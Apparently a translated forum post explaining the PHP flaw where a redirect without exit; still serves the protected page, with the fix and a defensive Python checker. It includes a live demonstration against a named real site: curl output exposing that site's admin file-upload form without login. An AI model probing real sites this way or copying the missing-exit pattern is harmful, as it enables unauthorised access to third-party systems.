Actually, the example you gave is itself vulnerable:
Code:
<?php
session_start(); // needed so that $_SESSION is populated at all
if (isset($_SESSION["root"])) {
    echo "ok";
} else {
    echo '<script language="javascript">location.href="https://www.google.az";</script>';
    // no exit here: the rest of the page is still sent to the unauthenticated client
}
Analogous hole:
http://packetstormsecurity.com/files/117421/videosmateorganizer-bypassdisclose.txt
Put exit; immediately after the echo.
Code:
echo '<script language="javascript">location.href="https://www.google.az";</script>'; exit; // stop here, nothing below is sent
Otherwise the script keeps executing.
The same applies to header("Location: /login.php")-style redirects (in admin panels).
Otherwise the script is vulnerable.
Live example:
Via curl. Note that it does not follow the redirect, so we can spot the vuln very easily.
Burp/Fiddler can also be used.
Code:
[blackhat@fedora ~]$ cd /tmp
[blackhat@fedora tmp]$ curl vors.am/cms/upload.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Pragma" content="no-cache">
<meta http-Equiv="Expires" content="0">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" type="text/css" href="css/mycss.css" />
<script language="javascript" type="text/javascript" src="js/function.js"></script>
<script language="javascript" type="text/javascript" src="js/ajax.js"></script>
<title>vors.am</title>
</head>
<body>
<form method="post" name="form_lng">
<input type="hidden" name="lng" />
</form>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border="0">
<TR>
<TD width="20"></TD>
<TD bgColor=#ffffff><a href="http://www.weboptima.am" target="_top"><IMG src="images/optima.gif" border="0" width=100></a></TD>
<TD vAlign=top align=right width="850" background="images/backtop2.gif">
<TABLE cellSpacing=0 cellPadding=0 width="100%" height='90' border="0">
<TR>
<TD align="right">
<img src="images/arm.jpg" class="lng_img1" onclick="lng_sub(1)" />
<img src="images/eng.jpg" class="lng_img" onclick="lng_sub(2)" />
<img src="images/rus.jpg" class="lng_img" onclick="lng_sub(3)" />
</TD>
<TD vAlign=top align=right width="150">
<FONT color='white' style="font-family:verdana;font-size:12px;">
<A href="http://www.weboptima.am" style="text-decoration:none;" target="_top">
<FONT color='white' style="font-family:verdana;font-size:12px;"><B>WEB OPTIMA</B></FONT></A>, Inc.</FONT> <BR>
<FONT color='white' style="font-family:verdana;font-size:11px;">
Phone.(060) 44-05-35<br>
Cell. (091) 26-11-18<br />
Cell. (094) 54-34-65<br />
</FONT>
</TD>
<TD width=10></TD>
</TR>
<tr>
<td align=right colspan="2">
<FONT color='white' style="font-family:verdana;font-size:11px;">
© Copyright 1996-2012 All rights reserved
</FONT>
</td>
<TD width=10></TD>
</tr>
</TABLE>
</TD>
</TR>
</TABLE>
<table width="100%" align="center" cellpadding="0" cellspacing="0" height="100%">
<tr>
<td width="250px" valign="top" bgcolor="#EAEAEA" class="td_border_r">
<div style="padding:10px;">
<div class="g_m"><a href="free_text.php?parent_id=1" class="menu2">Գլխավոր էջ</a></div>
<div class="g_m"><a href="menu.php?parent_id=0&type=1" class="menu2">Որսի մասին</a></div>
<div style="padding-left:10px;">
<div class="menu_dinamic1"><a href="menu.php?parent_id=127&type=1" class="menu">Որսից առաջ</a></div>
<div style="padding-left:10px">
<div class="menu_dinamic"><a href='free_code.php?parent_id=155' class='menu'>Որսորդական օրացույց</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=156' class='menu'>Որսորդական հրացան</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=157' class='menu'>Թռչյուններ</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=158' class='menu'>Շներ</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=159' class='menu'>Թակարդներ</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=160' class='menu'>Կրակելու դասընթացներ</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=161' class='menu'>Սարքավորումներ</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=162' class='menu'>Ռազմամթերքներ</a></div>
</div>
<div class="menu_dinamic1"><a href="menu.php?parent_id=129&type=1" class="menu">Որսի ընթացքում</a></div>
<div style="padding-left:10px">
<div class="menu_dinamic"><a href='free_code.php?parent_id=163' class='menu'>Վայրի կենդանիների որս</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=164' class='menu'>Կրծողներ</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=165' class='menu'>Ճահճային և մարգագետնային թռչյուններ</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=166' class='menu'>Դաշտային և տափաստանային թռչյուններ</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=167' class='menu'>Անտառային թռչյուններ</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=168' class='menu'>Ջրային թռչյուններ</a></div>
</div>
<div class="menu_dinamic1"><a href="menu.php?parent_id=132&type=1" class="menu">Որսից հետո</a></div>
<div style="padding-left:10px">
<div class="menu_dinamic"><a href='free_code.php?parent_id=169' class='menu'>Ավար</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=170' class='menu'>Խոհարարություն</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=171' class='menu'>Խարույկի մոտ</a></div>
</div>
</div>
<div class="g_m"><a href="menu.php?parent_id=0&type=3" class="menu2">Մեր մասին</a></div>
<div style="padding-left:10px;">
</div>
<div class="g_m"><a href="menu.php?parent_id=0&type=2" class="menu2">Օգտակար հղումներ</a></div>
<div style="padding-left:10px;">
<div class="menu_dinamic1"><a href='news.php?parent_id=175' class='menu'>Նորություններ</a></div>
<div class="menu_dinamic1"><a href='news.php?parent_id=173' class='menu'>Հայտարարություն</a></div>
<div class="menu_dinamic1"><a href='news.php?parent_id=174' class='menu'>Առաջարկություն</a></div>
</div>
<div class="g_m"><a href="contacts.php" class="menu2">Կապ</a></div>
<div class="g_m">&&& &&&&&&&&&&&&</div>
<div style="padding-left:10px">
<a href="banner.php?parent_id=0" class="menu1">Գործընկեր</a>
<a href="dictionary.php" class="menu1">&&&&&&&</a>
<a href="loginPass.php" class="menu1">&&&&&&</a>
<a href="upload.php" class="menu1">&&&& &&&&&&</a>
</div><br />
<div align="center"><img src="images/line.jpg" /></div>
<table cellpadding="3" cellspacing="3">
<tr>
<td><a href="exit.php" class="menu"><img src="images/logout.gif" border="0" /></a></td><td style="padding-left:5px;"><a href="exit.php" class="menu">&&&</a></td>
</tr>
</table>
</div>
</td>
<td valign="top" style="padding:10px"> <div align="center">
<table align="center">
<tr>
<td colspan="3" align="center"><span class="title">Կցված ֆայլեր</span></td>
</tr>
<tr>
<td>
</td>
</tr>
<tr >
<td >Ընտրել ֆայլը </td>
</tr>
<tr>
<td colspan="3"><form method="post" enctype="multipart/form-data"><input type="file" name="up_file" /> <input type="submit" class="button" name="sub" value="send"></form></td>
</tr>
<tr>
<td colspan="3" align="right">
</td> </tr>
<tr>
<td > </td>
</tr>
<tr>
<td colspan="3">
<a href="upload.php?letter=0&selType=0" style="margin-right:7px;">0 </a>
<a href="upload.php?letter=1&selType=0" style="margin-right:7px;">1 </a>
<a href="upload.php?letter=2&selType=0" style="margin-right:7px;">2 </a>
<a href="upload.php?letter=3&selType=0" style="margin-right:7px;">3 </a>
<a href="upload.php?letter=4&selType=0" style="margin-right:7px;">4 </a>
<a href="upload.php?letter=5&selType=0" style="margin-right:7px;">5 </a>
<a href="upload.php?letter=6&selType=0" style="margin-right:7px;">6 </a>
<a href="upload.php?letter=7&selType=0" style="margin-right:7px;">7 </a>
<a href="upload.php?letter=8&selType=0" style="margin-right:7px;">8 </a>
<a href="upload.php?letter=9&selType=0" style="margin-right:7px;">9 </a>
<br /> <a href="upload.php?letter=a&selType=0" style="margin-right:7px;">a </a>
<a href="upload.php?letter=b&selType=0" style="margin-right:7px;">b </a>
<a href="upload.php?letter=c&selType=0" style="margin-right:7px;">c </a>
<a href="upload.php?letter=d&selType=0" style="margin-right:7px;">d </a>
<a href="upload.php?letter=e&selType=0" style="margin-right:7px;">e </a>
<a href="upload.php?letter=f&selType=0" style="margin-right:7px;">f </a>
<a href="upload.php?letter=g&selType=0" style="margin-right:7px;">g </a>
<a href="upload.php?letter=h&selType=0" style="margin-right:7px;">h </a>
<a href="upload.php?letter=i&selType=0" style="margin-right:7px;">i </a>
<a href="upload.php?letter=j&selType=0" style="margin-right:7px;">j </a>
<a href="upload.php?letter=k&selType=0" style="margin-right:7px;">k </a>
<a href="upload.php?letter=l&selType=0" style="margin-right:7px;">l </a>
<a href="upload.php?letter=m&selType=0" style="margin-right:7px;">m </a>
<a href="upload.php?letter=n&selType=0" style="margin-right:7px;">n </a>
<a href="upload.php?letter=o&selType=0" style="margin-right:7px;">o </a>
<a href="upload.php?letter=p&selType=0" style="margin-right:7px;">p </a>
<a href="upload.php?letter=q&selType=0" style="margin-right:7px;">q </a>
<a href="upload.php?letter=r&selType=0" style="margin-right:7px;">r </a>
<a href="upload.php?letter=s&selType=0" style="margin-right:7px;">s </a>
<a href="upload.php?letter=t&selType=0" style="margin-right:7px;">t </a>
<a href="upload.php?letter=u&selType=0" style="margin-right:7px;">u </a>
<a href="upload.php?letter=v&selType=0" style="margin-right:7px;">v </a>
<a href="upload.php?letter=w&selType=0" style="margin-right:7px;">w </a>
<a href="upload.php?letter=x&selType=0" style="margin-right:7px;">x </a>
<a href="upload.php?letter=y&selType=0" style="margin-right:7px;">y </a>
<a href="upload.php?letter=z&selType=0" style="margin-right:7px;">z </a>
<br /> <a href="upload.php?letter=other&selType=0">մնացած ֆայլերը</a>
</td>
</tr>
<tr> <td> </td></tr>
</table>
</div>
</td>
</tr>
</table>
</body>
</html>
Because wget follows the redirects, the vuln cannot be seen this way (a browser does exactly the same).
Code:
[blackhat@fedora tmp]$ wget vors.am/cms/upload.php
--2015-05-05 00:37:08-- http://vors.am/cms/upload.php
Resolving vors.am (vors.am)... 50.87.153.244
Connecting to vors.am (vors.am)|50.87.153.244|:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: index.php [following]
--2015-05-05 00:37:09-- http://vors.am/cms/index.php
Reusing existing connection to vors.am:80.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘upload.php’
upload.php [ <=> ] 2.83K --.-KB/s in 0.003s
2015-05-05 00:37:10 (872 KB/s) - ‘upload.php’ saved [2897]
[blackhat@fedora tmp]$ head -n 30 upload.php
<HTML>
<HEAD>
<TITLE>Vors.am</TITLE>
<META http-equiv="pragma" content="no-cache">
<META http-equiv="Cache-Control" content="no-cache">
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<LINK rel="stylesheet" type="text/css" href="css/mycss.css">
</HEAD>
<BODY class="body">
<br><br><br><br><br><br>
<FORM id="frmMain" name="frmMain5" method="post">
<TABLE class="adm" cellSpacing=2 cellPadding=2 width=450 align=center border=1>
<TR>
<TD align="center" background="images/login-header.gif" height="60">
<FONT color=#ffffff size=5><STRONG>Log in to Admin</STRONG></FONT>
</TD>
</TR>
<TR>
<td align="center">
<table cellPadding=2 cellSpacing=2 border="0" width="80%" height="100">
<TR>
<TD rowspan="5"></TD>
<TD class=tables>
<font class="admtext11">Login</font>
</TD>
<TD class=tables>
<div align="right">
<font class=blacktext10>
<input type="text" name="login_text" maxlength="50" class="fields" />
[blackhat@fedora tmp]$ head -n 60 upload.php
<HTML>
<HEAD>
<TITLE>Vors.am</TITLE>
<META http-equiv="pragma" content="no-cache">
<META http-equiv="Cache-Control" content="no-cache">
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<LINK rel="stylesheet" type="text/css" href="css/mycss.css">
</HEAD>
<BODY class="body">
<br><br><br><br><br><br>
<FORM id="frmMain" name="frmMain5" method="post">
<TABLE class="adm" cellSpacing=2 cellPadding=2 width=450 align=center border=1>
<TR>
<TD align="center" background="images/login-header.gif" height="60">
<FONT color=#ffffff size=5><STRONG>Log in to Admin</STRONG></FONT>
</TD>
</TR>
<TR>
<td align="center">
<table cellPadding=2 cellSpacing=2 border="0" width="80%" height="100">
<TR>
<TD rowspan="5"></TD>
<TD class=tables>
<font class="admtext11">Login</font>
</TD>
<TD class=tables>
<div align="right">
<font class=blacktext10>
<input type="text" name="login_text" maxlength="50" class="fields" />
</font></div>
</TD>
</TR>
<TR>
<TD class=tables width="35">
<font class="admtext11">Password</font>
</TD>
<TD class=tables width="160">
<div align="right">
<font class=blacktext10><input type="password" name="password" maxlength="50" class="fields"/>
</font></div>
</TD>
</TR>
<TR>
<TR>
<TD class=tables width="35">
<FONT class="admtext11"><img src="kcaptcha/index.php?PHPSESSID=1e070ab2f6dcd4f80a2ce37495a7ad5e"></FONT>
</TD>
<TD class=tables width="160" valign="top">
<div align="right">
<font class=blacktext10><input type="text" name="kapcha" class="fields"/></font></div>
</TD>
</TR>
<TR>
<TD colspan="2" align="right">
<table width="50%" cellPadding=0 cellSpacing=0 class=tables border="0">
<TR>
[blackhat@fedora tmp]$
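As an added example (not the original poster's code), the curl observation above turned into an offline check: it parses a raw HTTP response the way curl -i prints it and flags a redirect, whether a Location header or a JS location.href, whose body still carries form markup, which is exactly the symptom of a missing exit;. The sample responses are constructed for the example.

```python
import re

# Constructed sample responses (in the form `curl -i` prints them); not real captures.
LEAKY_302 = (
    "HTTP/1.1 302 Moved Temporarily\r\nLocation: index.php\r\n"
    "Content-Type: text/html\r\n\r\n"
    '<html><body><form method="post" enctype="multipart/form-data">'
    '<input type="file" name="up_file" /></form></body></html>'
)
CLEAN_302 = "HTTP/1.1 302 Found\r\nLocation: /login.php\r\nContent-Length: 0\r\n\r\n"
LEAKY_JS = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    '<script>location.href="https://example.invalid/login";</script>'
    '<form method="post"><input type="file" name="up_file" /></form>'
)
NORMAL_200 = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<form><input /></form>"

# Markup that should never reach a client the application just decided to redirect away.
CONTENT_MARKERS = re.compile(r"<form\b|<input\b|<table\b|<textarea\b", re.I)
JS_REDIRECT = re.compile(r"location(\.href)?\s*=|location\.replace\(", re.I)


def parse_response(raw: str):
    """Split a raw HTTP/1.x response into (status code, lowercase header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def redirect_leaks_content(raw: str) -> bool:
    """True when the response redirects (Location header or JS) but the body still
    carries form/table markup, i.e. the script kept running after the redirect."""
    status, headers, body = parse_response(raw)
    http_redirect = 300 <= status < 400 and "location" in headers
    js_redirect = status == 200 and bool(JS_REDIRECT.search(body))
    if not (http_redirect or js_redirect):
        return False  # not a redirect at all: nothing to judge here
    return bool(CONTENT_MARKERS.search(body))


def audit(samples: dict) -> dict:
    """Run the check over several captured responses; returns {name: leaks?}."""
    return {name: redirect_leaks_content(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, leaks in audit({"leaky_302": LEAKY_302, "clean_302": CLEAN_302,
                              "leaky_js": LEAKY_JS, "normal_200": NORMAL_200}).items():
        print(f"{name}: {'LEAKS body after redirect' if leaks else 'ok'}")
```

Feed it `curl -s -i` output saved to a file (curl does not follow redirects by default) to repeat the check against your own admin pages.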